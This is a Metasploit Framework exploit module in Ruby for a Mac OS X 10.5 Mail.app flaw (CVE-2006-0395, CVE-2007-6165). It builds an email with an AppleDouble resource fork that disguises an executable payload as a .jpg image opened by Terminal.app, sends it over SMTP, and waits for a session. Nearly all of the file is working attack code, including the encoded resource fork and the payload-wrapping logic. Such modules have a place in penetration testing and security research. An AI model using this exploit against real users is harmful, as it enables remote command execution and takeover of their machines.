## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote # # This module sends email messages via smtp # include Msf::Exploit::Remote::SMTPDeliver def initialize(info = {}) super(update_info(info, 'Name' => 'Mail.app Image Attachment Command Execution', 'Description' => %q{ This module exploits a command execution vulnerability in the Mail.app application shipped with Mac OS X 10.5.0. This flaw was patched in 10.4 in March of 2007, but reintroduced into the final release of 10.5. }, 'License' => MSF_LICENSE, 'Author' => ['hdm', 'kf'], 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-0395'], ['CVE', '2007-6165'], ['OSVDB', '40875'], ['BID', '26510'], ['BID', '16907'] ], 'Stance' => Msf::Exploit::Stance::Passive, 'Payload' => { 'Space' => 8192, 'DisableNops' => true, 'BadChars' => "", 'Compat' => { 'ConnectionType' => '-bind -find', 'RequiredCmd' => 'generic perl ruby bash telnet', }, }, 'Targets' => [ [ 'Mail.app - Command Payloads', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, } ], [ 'Mail.app - Binary Payloads (x86)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], [ 'Mail.app - Binary Payloads (ppc)', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, } ], ], 'DisclosureDate' => 'Mar 01 2006' )) register_options( [ OptString.new('MAILSUBJECT', [false, "The subject of the sent email"]) ], self.class) end def autofilter false end def exploit exts = ['jpg'] gext = exts[rand(exts.length)] name = rand_text_alpha(5) + ".#{gext}" data = rand_text_alpha(rand(32)+1) msg = Rex::MIME::Message.new msg.mime_defaults msg.subject = datastore['MAILSUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1) msg.to = datastore['MAILTO'] msg.from = datastore['MAILFROM'] dbl = Rex::MIME::Message.new dbl.header.set("Content-Type", "multipart/appledouble;\r\n boundary=#{dbl.bound}") dbl.header.set("Content-Disposition", "inline") # AppleDouble file version 2 # 3 entries - 'Finder Info', 'Real name', 'Resource Fork' # Real Name matches msf random generated 5 character name - (I cheated ala gsub) resfork = "AAUWBwACAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAJAAAAPgAAAAoAAAADAAAASAAAAAkAAAACAAAA\r\n" + "UQAABToAAAAAAAAAAAAASGVpc2UuanBnAAABAAAABQgAAAQIAAAAMgAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQA\r\n" + "AAAlL0FwcGxpY2F0aW9ucy9VdGlsaXRpZXMvVGVybWluYWwuYXBwAOzs7P/s7Oz/7Ozs/+zs7P/s\r\n" + "7Oz/7Ozs/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/5ubm/+bm5v/m5ub/5ubm/+bm\r\n" + "5v/m5ub/5ubm/+bm5v/p6en/6enp/+np6f/p6en/6enp/+np6f/p6en/6enp/+zs7P/s7Oz/7Ozs\r\n" + "/+zs7P/s7Oz/7Ozs/+zs7P/s7Oz/7+/v/+/v7//v7+//7+/v/+/v7//v7+//7+/v/+/v7//z8/P/\r\n" + "8/Pz//Pz8//z8/P/8/Pz//Pz8//z8/P/8/Pz//b29v/29vb/9vb2//b29v/29vb/9vb2//b29v/2\r\n" + "9vb/+Pj4//j4+P/4+Pj/+Pj4//j4+P/4+Pj/+Pj4//j4+P/8/Pz//Pz8//z8/P/8/Pz//Pz8//z8\r\n" + "/P/8/Pz//Pz8////////////////////////////////////////////////////////////////\r\n" + "/////////////////////6gAAACoAAAAqAAAAKgAAACoAAAAqAAAAKgAAACoAAAAKgAAACoAAAAq\r\n" + "AAAAKgAAACoAAAAqAAAAKgAAACoAAAADAAAAAwAAAAMAAAADAAAAAwAAAAMAAAADAAAAAwAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAQAAAAUIAAAECAAAADIAX9CsEsIAAAAcADIAAHVzcm8AAAAKAAD//wAAAAABDSF8" + "\r\n" fork = Rex::Text.encode_base64( Rex::Text.decode_base64(resfork).gsub("Heise.jpg",name), "\r\n" ) cid = "<#{rand_text_alpha(rand(16)+16)}@#{rand_text_alpha(rand(16)+1)}.com>" cmd = '' if (target.arch.include?(ARCH_CMD)) cmd = Rex::Text.encode_base64(payload.encoded, "\r\n") else bin = '' if(target.arch.index(ARCH_PPC)) bin = Rex::Text.to_osx_ppc_macho(payload.encoded, '') end if(target.arch.index(ARCH_X86)) bin = Rex::Text.to_osx_x86_macho(payload.encoded, '') end cmd = Rex::Text.encode_base64(bin, "\r\n") end dbl.add_part(fork , "application/applefile;\r\n name=\"#{name}\"", "base64", "inline;\r\n filename=#{name}" ) dbl.add_part(cmd , "image/jpeg;\r\n x-mac-type=0;\r\n x-unix-mode=0755;\r\n x-mac-creator=0;\r\n name=\"#{name}\"", "base64\r\nContent-Id: #{cid}", "inline;\r\n filename=#{name}" ) msg.parts << dbl send_message(msg.to_s) print_status("Waiting for a payload session (backgrounding)...") end end